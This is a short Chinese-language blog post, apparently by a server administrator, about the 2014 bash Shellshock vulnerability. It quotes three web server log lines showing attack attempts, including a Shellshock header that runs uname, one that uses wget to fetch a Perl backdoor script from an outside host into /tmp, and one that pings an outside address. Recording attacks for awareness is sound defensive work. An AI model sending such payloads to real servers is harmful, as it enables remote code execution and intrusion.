關於 bash vulnerable and shellshock

access_log 上已有被 try 的記錄

大部份是 echo XXX 的記錄

54.251.83.67 – – [26/Sep/2014:15:36:34 +0800] “GET / HTTP/1.1” 403 539 “-” “() { :;}; /bin/bash -c \”echo testing9123123\”; /bin/uname -a”

也有是下載 perl 程式，看樣子是可以可以另開通道 login 進到主機，source code 同這個

109.95.210.196 – – [26/Sep/2014:10:50:00 +0800] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1” 404 1234 “-” “() { :;}; /bin/bash -c \”/usr/bin/wget http://singlesaints.com/firefile/temp?h=rebel-audio.com.tw -O /tmp/a.pl\”

也有 ping

198.20.69.74 – – [26/Sep/2014:07:23:41 +0800] “GET / HTTP/1.1” 200 12801 “() { :; }; /bin/ping -c 1 104.131.0.69” “() { :; }; /bin/ping -c 1 104.131.0.69”

關於 bash vulnerable and shellshock

Related posts 相關文章

2014 年大事件回顧 – 資訊安全 – 重大漏洞 – SSL/BASH

What ! Windows 也有 ShellShock ??

好煩喔之持續觀注 bash/shellshock 漏洞

我在升級過程遇到的 bash 套件版本更新變化

作者

留言

撰寫回覆或留言取消回覆

關於 bash vulnerable and shellshock

Related posts 相關文章

2014 年大事件回顧 – 資訊安全 – 重大漏洞 – SSL/BASH

What ! Windows 也有 ShellShock ??

好煩喔之持續觀注 bash/shellshock 漏洞

我在升級過程遇到的 bash 套件版本更新變化

作者

留言

撰寫回覆或留言 取消回覆

撰寫回覆或留言取消回覆